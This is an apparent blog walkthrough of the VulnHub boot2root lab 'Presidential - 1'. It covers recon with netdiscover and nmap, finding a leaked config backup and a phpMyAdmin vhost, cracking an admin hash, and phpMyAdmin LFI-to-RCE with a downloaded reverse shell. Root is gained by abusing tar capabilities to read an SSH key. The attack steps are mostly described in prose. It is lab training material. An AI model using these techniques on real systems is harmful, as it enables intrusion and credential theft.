Today we are
going to solve another boot2root challenge called "Presidential - 1". It's available at VulnHub for penetration
testing and you can download it from here.
The credit for
making this lab goes to Thomas Williams. Let's get started and learn how
to successfully break it down.
Level: Hard
Penetration Testing Methodology
Recognition
§
Netdiscover
§
Nmap
Enumeration
§
Gobuster
§
Forgotten backup files
Exploiting
- John The Ripper
- RCE via LFI from phpMyAdmin
Privilege
Escalation
§
Abuse
of Linux Capabilities
§
Capture
the flag
Walkthrough
Recognition
We
are looking for the machine with netdiscover
netdiscover -i ethX
So, let's start by running map to all ports with OS
detection, software versions, scripts and traceroute.
nmap -A-p- 192.168.10.172
Enumeration
We entered the web service and visited the different
sections and found an email with the domain name.
We edit the file "/etc/hosts" and associate the IP address with the domain
found.
We start Gobuster
and configure it to find files by specific extensions.
We find a file called "config.php.bak", these files usually contain database access credentials.
File
content "config.php.bak":
Exploiting
Back
to Gobuster, this time we'll pass a
"medium directory" dictionary with the "vhost" option, this way we'll list
sub-domains.
We'll
get a single result:
We access the
address of the subdomain, find an access panel to "phpMyAdmin", insert the credentials obtained in the previous
file and find the password of the user "admin". It is likely that the user will reuse the same
credential for other corporate services.
We saved the hash in a file and cracked it with John The Ripper and the famous "rockyou" dictionary.
The next
step, will be to list the version of "phpMyAdmin"
and find some exploit that can serve to gain access to the interior of the
machine.
We found this
exploit that
allows us to execute commands from a SQL statement and embedding a file (LFI) with our session cookie.
We make a test by executing a phpinfo() as a proof of
concept.
Result PoC:
It works! It's time to complicate it, we will create a
file called "m3n0shell.sh"
with a reverse shell, we will raise a server with Python and we will execute a
sequence of three commands so that it downloads it, gives it execution
permissions and executes it.
And don't forget to have a netcat listening to port 4444!!!
If all goes well, we'll have a reverse shell. We
authenticate ourselves with the credentials of the user "admin", we use Python to get an
interactive shell, we read the flag of “user.txt”
and the file “notes.txt”.
Privilege Escalation (root)
We list the available capabilities, we see that we have
"+EP" to the tarS binary.
This binary allows us to compress any file on the system without being root.
Therefore, once we have it compressed, we will only have to decompress it to be
able to read the content of the file.
Having said this, we can now compress the file "id_rsa", decompress it and we will
be able to obtain visibility to the content.
We copy the content of "id_rsa", give it permissions and
connect as the "root" user
through the SSH service.
Once inside, we can read the flag.
0 comments:
Post a Comment